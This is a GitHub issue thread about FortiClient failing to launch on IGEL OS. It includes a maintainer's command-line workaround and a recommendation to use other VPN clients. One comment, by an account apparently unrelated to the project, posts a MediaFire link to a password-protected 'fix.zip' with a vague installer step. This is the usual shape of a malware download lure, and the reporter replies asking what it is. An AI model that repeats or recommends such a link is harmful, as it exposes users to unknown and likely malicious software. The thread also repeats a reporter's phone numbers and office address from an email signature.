### ISSUE TITLE
FortiClient launch issue

### ISSUE THREAD

**Issue by nmoores11** [IGEL-Community/IGEL-Custom-Partitions#39]
Hello, 

I have followed the instructions for your latest FortiClient build. Everything installs fine, but then FortiClient does not launch. I go to run it through cli, but get an error that the EMS license is expired.

**Comment by rneher-igel** [comment]
Yes there are issues with the software on IGEL OS.

NOTE: FortiClient blank screen on start-up. The window opens with no text. Looking into the issue.

WORKAROUND: Run from the command line /custom/forticlient/opt/forticlient/forticlient-cli vpn --help

For now recommend using one of the other VPN clients to connect.

https://igel-community.github.io/IGEL-Docs-v02/Docs/HOWTO-VPN/

**Comment by rneher-igel** [comment]
For now recommend using one of the other VPN clients to connect.

https://igel-community.github.io/IGEL-Docs-v02/Docs/HOWTO-VPN/

**Comment by nmoores11** [comment]
No window pops up at all, though. I am fine with the workaround, but received the error that EMS license is expired.


Nick Moores
Infrastructure Administrator
[Standards IT Logo]
www.standardsit.com<https://urldefense.com/v3/__https:/www.standardsit.com/__;!!PryGUe7zedMk!QNMWvwW0Gzb69d46sOQNDiOB6wzFCPohD7jGq3HwuzGhQxX1e-dHJI6ZnIpuev1799sdHQri9dbSMRk_hLQiStjWASFE7c4$>
+1 (800) 717-2601 Office
+1 (405) 401-4695 Cell
130 N. Broadway, Suite 200
Edmond, OK 73034

CONFIDENTIALITY NOTICE: The Receipt of this email and its attachments, and any individual or entity thereafter viewing it, are given notice that it contains information from the Sender which may be considered confidential, proprietary, non-public, personal, and/or legally privileged. The information is intended only for the use by the individual or entity named on the email, and only for the intended purpose. If you are not the intended recipient, the document should be returned to Sender immediately and permanently deleted. In this regard, if you have received this email in error, please notify the Sender by email.



________________________________
From: Ron Neher ***@***.***>
Sent: Tuesday, August 27, 2024 10:42 AM
To: IGEL-Community/IGEL-Custom-Partitions ***@***.***>
Cc: Nick Moores ***@***.***>; Author ***@***.***>
Subject: [External]Re: [IGEL-Community/IGEL-Custom-Partitions] FortiClient launch issue (Issue #39)


Yes there are issues with the software on IGEL OS.

NOTE: FortiClient blank screen on start-up. The window opens with no text. Looking into the issue.

WORKAROUND: Run from the command line /custom/forticlient/opt/forticlient/forticlient-cli vpn --help

For now recommend using one of the other VPN clients to connect.

https://igel-community.github.io/IGEL-Docs-v02/Docs/HOWTO-VPN/

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nmoores11** [comment]
Sorry can you explain what this is and does?


Nick Moores
Infrastructure Administrator
[Standards IT Logo]
www.standardsit.com<https://urldefense.com/v3/__https:/www.standardsit.com/__;!!PryGUe7zedMk!QNMWvwW0Gzb69d46sOQNDiOB6wzFCPohD7jGq3HwuzGhQxX1e-dHJI6ZnIpuev1799sdHQri9dbSMRk_hLQiStjWASFE7c4$>
+1 (800) 717-2601 Office
+1 (405) 401-4695 Cell
130 N. Broadway, Suite 200
Edmond, OK 73034

CONFIDENTIALITY NOTICE: The Receipt of this email and its attachments, and any individual or entity thereafter viewing it, are given notice that it contains information from the Sender which may be considered confidential, proprietary, non-public, personal, and/or legally privileged. The information is intended only for the use by the individual or entity named on the email, and only for the intended purpose. If you are not the intended recipient, the document should be returned to Sender immediately and permanently deleted. In this regard, if you have received this email in error, please notify the Sender by email.



________________________________
From: miniMuggle ***@***.***>
Sent: Tuesday, August 27, 2024 10:52 AM
To: IGEL-Community/IGEL-Custom-Partitions ***@***.***>
Cc: Nick Moores ***@***.***>; Author ***@***.***>
Subject: [External]Re: [IGEL-Community/IGEL-Custom-Partitions] FortiClient launch issue (Issue #39)


Download
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
